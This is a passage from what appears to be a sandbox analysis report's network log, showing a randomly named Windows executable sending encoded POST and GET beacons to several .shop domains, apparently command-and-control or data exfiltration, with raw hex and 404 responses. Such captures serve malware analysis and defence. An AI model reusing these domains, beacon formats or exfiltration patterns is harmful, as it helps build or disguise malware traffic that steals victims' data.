Oct 31, 2024 10:28:32.205207109 CET	461	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:32 GMT Server: Apache/2.4.62 (Debian) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50029	178.79.184.196	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:33.927992105 CET	1762	OUT	POST /x3by/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.gucciqueen.shop Origin: http://www.gucciqueen.shop Referer: http://www.gucciqueen.shop/x3by/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 4c 6f 63 47 38 71 35 73 30 54 69 7a 4a 4f 2f 4b 6a 6d 58 30 43 4d 69 6e 4a 53 46 73 31 35 69 35 4d 58 41 4b 51 6e 70 71 42 49 5a 37 56 47 54 38 30 2b 68 4c 6b 41 4a 43 34 47 42 51 61 76 43 6b 53 66 30 54 75 47 70 4d 6c 58 59 56 65 45 46 75 54 6e 51 79 34 53 6a 77 37 74 49 75 2f 61 5a 6d 32 69 62 6c 55 34 46 5a 4c 4c 77 5a 4f 49 74 51 55 61 75 31 67 72 6b 44 37 62 32 58 6f 72 6d 70 34 72 45 64 46 4a 50 2f 2f 33 4f 46 68 39 59 62 78 70 46 47 48 70 39 44 66 58 77 65 68 4e 6d 30 35 71 4e 34 35 6a 6f 2b 68 56 33 32 79 73 4e 4d 77 54 32 36 46 31 50 38 65 73 4a 4c 47 76 2f 73 36 71 46 4b 72 53 31 4e 4e 71 5a 50 30 34 59 5a 31 34 71 35 6a 50 41 58 2b 71 38 61 76 6d 67 6e 70 32 75 2f 54 44 53 53 5a 55 41 45 54 54 50 47 71 77 75 4e 55 4b 42 4b 7a 41 64 70 48 36 6f 45 56 54 33 54 54 66 33 6c 50 59 50 34 44 45 4d 72 59 7a 48 51 7a 78 78 56 49 6b 75 33 58 55 4c 44 63 4e 32 2b 33 6d 72 4a 4b 6b 6d 41 63 6c 66 4a 5a 4e 50 57 69 50 33 31 53 6c 43 33 78 32 50 32 42 74 75 39 62 57 34 57 68 5a 4e 34 4c [TRUNCATED] Data Ascii: 1Zgl=LocG8q5s0TizJO/KjmX0CMinJSFs15i5MXAKQnpqBIZ7VGT80+hLkAJC4GBQavCkSf0TuGpMlXYVeEFuTnQy4Sjw7tIu/aZm2iblU4FZLLwZOItQUau1grkD7b2Xormp4rEdFJP//3OFh9YbxpFGHp9DfXwehNm05qN45jo+hV32ysNMwT26F1P8esJLGv/s6qFKrS1NNqZP04YZ14q5jPAX+q8avmgnp2u/TDSSZUAETTPGqwuNUKBKzAdpH6oEVT3TTf3lPYP4DEMrYzHQzxxVIku3XULDcN2+3mrJKkmAclfJZNPWiP31SlC3x2P2Btu9bW4WhZN4LoNNCchAJetB12x7jKTEtFEE1QQlyiKGekWIL0IuoaNtf94PPmxjPgkGTE5vcBjakXz4zVpQb7ku8pRw5kF9BW7YnDfKGrXZiXS8Gyb0yh3biHK0fy/N3TFjlCI/nTaFWO5XOy8duJmyS2eY5NEOJKnxrd8L0tjJIzmJGn4uuIR0W1KUSr1G2tqhtVsyZIQdprCmtlivn/j9jzEfcGljzbrufsQuU571+zIuvKkm4f0imNRxyMUy/4jQwBrc6uoyYyX1mHDY+rYpzLrvpnV9A6weAngrzB9YcIBWFRjrDzkXsX9nLlrPMAmczOpjsjTHP5zNrkmw7NbkiBw3Mxmoh6h2otLFPr467FxdRejsEEMEWXBAbIBKqzNYBDhzGzuir5AgxcCaPal7PegQpevW0MW3h/DM2ymH5c+rOVxMDvFWnFgR5Z1Ef1pQSJuZK97DALZfLnsC8lX19kkyMIPdQGGTrWcTVOlYcBxldr2Y0hXnNVyxcboqZ69Wv7Q4LUGMPv++SG3JEECdEWaMA3puvDI5qELUEqD57VKL4fVrQe60bpBHOGtep6X2ykDyA3RWpZqWqeJ4p1pYw6vYONf2hcRW6Ed3WaeCKkyGCKiPuOCE2/MamyC+gFieJxV1hBfs2gAhsRScaN2HhxWjArdA6xNdnaJfPk2MjK2 [TRUNCATED]
Oct 31, 2024 10:28:34.737459898 CET	461	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:34 GMT Server: Apache/2.4.62 (Debian) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50030	178.79.184.196	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:36.470405102 CET	460	OUT	GET /x3by/?w6=2vdPP&1Zgl=Gq0m/cYr7UOoL/rfxlXcWcb0PFgu3v+6IQg5KkZ1GbFCfXnP9OdFnXsg+153ZunkN9E3pnQymCUHBFpvF3MPrj7bwNIl4rM9hQX9D40sB8Q0fvNSVLrWgvNkuIucpqHerw== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.gucciqueen.shop User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:28:37.274589062 CET	461	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:37 GMT Server: Apache/2.4.62 (Debian) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50031	188.114.97.3	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:50.765952110 CET	731	OUT	POST /3p0l/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.timizoasisey.shop Origin: http://www.timizoasisey.shop Referer: http://www.timizoasisey.shop/3p0l/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 31 4c 62 49 35 6a 46 49 6c 5a 70 73 44 57 47 51 2b 48 39 32 67 69 55 78 41 33 73 35 35 58 71 2f 45 6f 49 69 4b 71 56 46 71 49 4b 5a 70 31 68 4a 7a 36 62 5a 46 69 73 4c 37 56 37 72 44 64 4c 50 74 47 39 35 76 78 5a 6e 31 65 50 33 2b 6a 76 66 58 6b 47 77 43 30 35 37 73 4f 38 67 62 32 72 77 70 5a 6e 6e 6e 57 6a 68 6b 51 50 79 2b 42 53 73 30 4e 32 6f 4f 6c 6f 68 57 4f 79 76 4a 69 47 73 6c 57 77 4e 35 56 4a 47 35 64 2f 6f 79 4f 74 6e 56 52 51 54 49 6c 7a 36 39 48 45 31 55 48 38 43 62 35 43 47 66 4a 44 63 47 34 51 54 41 73 6d 70 56 34 78 62 6a 44 6d 42 7a 6a 52 56 62 4f 78 4b 4d 50 71 76 37 33 77 3d Data Ascii: 1Zgl=1LbI5jFIlZpsDWGQ+H92giUxA3s55Xq/EoIiKqVFqIKZp1hJz6bZFisL7V7rDdLPtG95vxZn1eP3+jvfXkGwC057sO8gb2rwpZnnnWjhkQPy+BSs0N2oOlohWOyvJiGslWwN5VJG5d/oyOtnVRQTIlz69HE1UH8Cb5CGfJDcG4QTAsmpV4xbjDmBzjRVbOxKMPqv73w=
Oct 31, 2024 10:28:51.617609024 CET	1053	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:51 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtOpCwyehXoIXy1FVgwGym%2F2vXk2v7yXR4wLy2d9CLw8Saum5vZDI%2FdU%2FKIBpDpVHSaT%2BShHWMUPtjJN1NjDdnj4ZZP9IkvvGjBhsAu2SnKa0YAXze5qgymz8Xef77MupJKdovq09dM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db29e089b744768-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1905&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50032	188.114.97.3	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:53.317709923 CET	751	OUT	POST /3p0l/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.timizoasisey.shop Origin: http://www.timizoasisey.shop Referer: http://www.timizoasisey.shop/3p0l/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 31 4c 62 49 35 6a 46 49 6c 5a 70 73 53 46 4f 51 35 67 4a 32 77 79 55 32 45 48 73 35 79 33 71 7a 45 6f 55 69 4b 6f 35 56 71 2b 53 5a 71 52 74 4a 77 2b 76 5a 4c 43 73 4c 75 6c 37 75 64 74 4c 36 74 47 35 66 76 30 35 6e 31 65 62 33 2b 69 66 66 55 58 65 7a 43 6b 35 35 67 75 38 75 47 47 72 77 70 5a 6e 6e 6e 57 32 32 6b 51 58 79 2b 77 69 73 30 73 32 72 44 46 6f 6d 52 4f 79 76 4e 69 47 67 6c 57 77 37 35 58 78 34 35 66 48 6f 79 4d 31 6e 56 6b 38 51 44 6c 7a 38 35 48 45 6b 45 48 78 53 62 36 69 73 64 59 4f 67 56 49 59 39 49 36 58 44 50 61 35 7a 77 6a 4b 35 6a 77 5a 69 4b 2b 51 6a 57 73 36 66 6c 67 6b 45 59 65 37 74 45 6c 6c 36 6c 6e 52 79 45 68 46 62 76 2f 4d 6c Data Ascii: 1Zgl=1LbI5jFIlZpsSFOQ5gJ2wyU2EHs5y3qzEoUiKo5Vq+SZqRtJw+vZLCsLul7udtL6tG5fv05n1eb3+iffUXezCk55gu8uGGrwpZnnnW22kQXy+wis0s2rDFomROyvNiGglWw75Xx45fHoyM1nVk8QDlz85HEkEHxSb6isdYOgVIY9I6XDPa5zwjK5jwZiK+QjWs6flgkEYe7tEll6lnRyEhFbv/Ml
Oct 31, 2024 10:28:54.175386906 CET	1060	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:54 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg5Hakm8o66qk7UEfdmIuUv5j8%2FFGetbZs%2BVFQNHxNTVerJ0rDKHMXmqTmziwKbyk5hCelsGt%2BWylfqTe%2FN5B%2FI2Z1nS23mVVAsG2O3XJi4NvwOGcBK2Wmw6oRZJzmRqPPgPkl6JEBI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db29e18889ee9ce-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1090&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50033	188.114.97.3	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:55.914752960 CET	1768	OUT	POST /3p0l/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.timizoasisey.shop Origin: http://www.timizoasisey.shop Referer: http://www.timizoasisey.shop/3p0l/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 31 4c 62 49 35 6a 46 49 6c 5a 70 73 53 46 4f 51 35 67 4a 32 77 79 55 32 45 48 73 35 79 33 71 7a 45 6f 55 69 4b 6f 35 56 71 2b 71 5a 71 6b 78 4a 79 66 76 5a 4b 43 73 4c 79 31 37 76 64 74 4c 64 74 43 64 62 76 30 6c 4e 31 64 6a 33 2f 41 58 66 44 57 65 7a 4e 6b 35 35 39 2b 38 76 62 32 71 79 70 5a 32 67 6e 57 6d 32 6b 51 58 79 2b 7a 36 73 79 39 32 72 42 46 6f 68 57 4f 79 7a 4a 69 47 45 6c 57 6f 72 35 58 30 4e 35 73 50 6f 78 73 6c 6e 58 32 45 51 4f 6c 7a 2b 2b 48 46 35 45 48 38 49 62 36 2b 4b 64 59 36 65 56 4b 49 39 4c 63 65 6c 4e 6f 70 48 69 41 79 6f 7a 33 42 48 55 4c 41 66 66 64 54 6c 76 78 41 51 64 64 44 54 46 77 31 61 68 58 73 47 51 33 31 71 68 4a 46 53 70 71 34 63 6f 64 4d 52 31 53 52 4b 70 62 68 49 33 44 30 64 7a 4c 7a 52 6d 55 50 56 70 55 51 76 2b 4b 78 38 38 79 46 57 39 48 53 59 67 77 51 51 58 53 56 71 7a 43 2b 46 78 46 69 65 48 34 53 2f 6a 5a 56 48 4b 6f 50 73 2b 74 4f 66 69 4e 44 41 57 56 72 65 6d 63 34 46 56 4c 4e 61 43 48 59 73 71 36 58 45 45 2f 4e 6b 72 4a 6d 6c 63 77 6e 59 36 [TRUNCATED] Data Ascii: 1Zgl=1LbI5jFIlZpsSFOQ5gJ2wyU2EHs5y3qzEoUiKo5Vq+qZqkxJyfvZKCsLy17vdtLdtCdbv0lN1dj3/AXfDWezNk559+8vb2qypZ2gnWm2kQXy+z6sy92rBFohWOyzJiGElWor5X0N5sPoxslnX2EQOlz++HF5EH8Ib6+KdY6eVKI9LcelNopHiAyoz3BHULAffdTlvxAQddDTFw1ahXsGQ31qhJFSpq4codMR1SRKpbhI3D0dzLzRmUPVpUQv+Kx88yFW9HSYgwQQXSVqzC+FxFieH4S/jZVHKoPs+tOfiNDAWVremc4FVLNaCHYsq6XEE/NkrJmlcwnY6PZx7OR1GZgeJR+8dVPQIK7cFNICpePv/f1UT7kiIpts/f18wup0OosEekK/m0+2B80U2mFAOuTciJJ+hQq7jNXVcQJ1VQuhTKNkKXAltz8MY4EoZvOyrNYkhRJgEn/Cr5wnb7dVBxkjkv2A6oX+GrNaoU8PVePCxm1fk+0lBiNf8QilXaRvhqFPuNVLc6Vmf1e4Sgf5QCLZGHcPUVIh28Et9y4ptxeZtCwZXIspIr5JjBMPIeRRWG9yw4pLgkkA4LocWDhgfMHwjYYnSqt/P3aXMnH82Qd6BLpTPqf2p6BVI496mgfwhHRQQr3zDx58Dul+av3GmsL/CF2ULTIus+G8bhN5MkH3oHf84ClH8H3tzgg/+QegR7TkVNOW5bwMmfgFJMS1JyoflEFmFTgQPZWi4k9wAsX/q9QPhC15ops/GQIATFrSSv98x0odL0YqZyGA6pIr/IyavumtDBOkDGwFHSHZeXjIy5ROz0rh2vHOy7e+Qd7Zn5NvmiRjp2NIR2frOoI8/AyJlMhcNoZGsMFNG4tGJw48R/ujb9y7ZuPOMr4ALFFaDbIQ/EofkvsDr9Kc13w7ePczof4Bfpsfp1ljeZ08o/UIavfl5UYZOLnWlF4YZCuZ7pZ4tAJxwdaZKUGL+3t5KPhrj1+koeCpxL+9JvDXISn+wHx [TRUNCATED]
Oct 31, 2024 10:28:56.769582033 CET	1052	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:56 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpg4hFaN%2FymN5chz8DbJoUR%2Fjxz3HHHeUOv6y6Sk2CscH%2BC5thizAlJF6StLKu21DAYyXNBi00qqkdyvJZSUYBC1zeufwlbnvbBq1MxA08aZRuDLRW6KANkwkYlPZ9nCLbnYC2VDphE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db29e28bd76cb76-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1574&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1768&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	50034	188.114.97.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:58.859709978 CET	462	OUT	GET /3p0l/?1Zgl=4Jzo6X1Gluc/SF20pEVAyAZrEiE76xvvY+EfZYFlmMajnWRT/uq2dkdTzHDiVdaw3QhDvVFcv5rBuyftUViEMVRHp90uGCn944ajrH63wHv4zzWs5+CZDXB+Ld7sX0D68A==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.timizoasisey.shop User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:28:59.729388952 CET	1107	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:59 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R4WskpB4gzjhxF%2FwLimhq3Hc0Eg%2BVCEikYc%2FyYJ%2BvKvf3iwbo7nDGQOCwkSWrukp1XQwGvpQEVldEgAJ3b0RbWODV4PO7et5MSLsYkdwqy8%2FfW9Mlz0oIwRCKcYOlEgE5EpZxLYYxCQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db29e3b3b4aeaa4-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1090&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=462&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 